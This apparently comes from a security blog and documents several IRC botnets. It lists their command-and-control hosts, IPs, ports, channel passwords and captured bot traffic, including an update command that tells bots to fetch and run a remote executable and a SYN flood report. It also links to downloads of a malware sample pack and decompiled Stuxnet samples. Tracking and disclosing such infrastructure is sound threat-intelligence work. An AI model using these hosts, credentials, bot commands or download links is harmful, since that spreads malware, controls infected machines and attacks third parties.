Another malware package

Here are around 34 MB of malware samples (fake antiviruses, password stealers, banking trojans, etc.).
Download: http://www.p1nk.me/VtzvTy

dns.googleure.com (botnet hosted in Russian Federation 2×4.ru Network)

dns.googleure.com DNS_TYPE_A 92.241.164.227
92.241.164.227:1234
Nick: n{US|XPa}xvwpyyv
Username: xvwpyyv
Server Pass: null
Joined Channel: #!ngr! with Password ngrBot
Joined Channel: #US
Channel Topic for Channel #!ngr!: ".mod pdef off .s .j -c IT,ITA,ES,ESP,FR,FRA #uz4 .up http://jeanie.ws/new.exe 3c62c54ff04ae4af8262ae4d5e2683c7"
Private Message to Channel #!ngr!: "[d="http://jeanie.ws/new.exe" s="278528 bytes"] Updated bot file "C:\Documents and Settings\Administrator\Application Data\Dekfki.exe""
Info about hosting: http://whois.domaintools.com/92.241.164.227

nice.niceshot.in (botnet hosted in Netherlands Rijndata B.v)

Remote Host     Port Number
46.21.169.42    6567

PASS s1m0n3t4
MODE [SI|USA|00|P|57896] -ix
JOIN #yur# c1rc0dusoleil
PONG Apple.Network
NICK [SI|USA|00|P|57896]
USER XP-0495 * 0 :COMPUTERNAME
MODE [SI|USA|00|P|69385] -ix
JOIN #wal# c1rc0dusoleil
PRIVMSG #wal# :[Dl]: File download: 96.0KB to: C:\DOCUME~1\UserName\LOCALS~1\Temp\eraseme_12581.exe @ 96.0KB/sec.
QUIT [Update]: Updating to new bin.
NICK [SI|USA|00|P|48857]
USER XP-5184 * 0 :COMPUTERNAME
MODE [SI|USA|00|P|48857] -ix

77.79.7.106 (botnet hosted in Lithuania Webhosting Collocation Services)

Remote Host       Port Number
174.37.72.72      80
204.0.5.56        80
216.178.38.224    80
63.135.80.46      80
69.63.181.16      80
77.79.7.106       6663

PASS xxx
MODE NEW-[USA|00|P|01494] -ix
JOIN #!nn! test
PONG irc.priv8net.com
NICK NEW-[USA|00|P|01494]
USER XP-6931 * 0 :COMPUTERNAME

Now talking in #!nn!
Topic On: [ #!nn! ] [ .m.s|.m.e Foto 😀 http://apps.facebook.com/phootosofyour/photo.php?= ]
Topic By: [ wd38 ]
Topic: wd38

minerva.cdmon.org (botnet hosted in Netherlands Amsterdam As29073 Ecatel Ltd)

NICK {XPUSA288239}
USER COMPUTERNAME * 0 :COMPUTERNAME
MODE {XPUSA288239} -ix
JOIN ##spam##
MODE ##spam## -ix
PRIVMSG ##spam## :.::[DDoS]::. Flooding 127.0.0.2:1234 with ddos.syn for 50 seconds
PRIVMSG ##spam## :.::[DDoS]::. Done with flood (0KB/sec).
NICK {XPUSA796543}
MODE {XPUSA796543} -ix

Resolved : [minerva.cdmon.org] To [89.248.172.225]
Now talking in ##security-check##
Topic On: [ ##security-check## ] [ .part ##security-check# ]

205.234.213.231 (botnet hosted in United States Chicago Hostforweb Inc)

Remote Host        Port Number
204.0.5.51         80
63.135.80.224      80
63.135.80.46       80
205.234.213.231    1234

PASS xxx
NICK NEW-[USA|00|P|39876]
USER XP-0115 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|39876] -ix
JOIN #!nn! test
PONG 22 MOTD

Info about hosting: http://whois.domaintools.com/205.234.213.231

Stuxnet decompiled samples

Source here: http://crowdleaks.org/hbgary-wanted-to-suppress-stuxnet-research/
Download: http://11ec4fbd.whackyvidz.com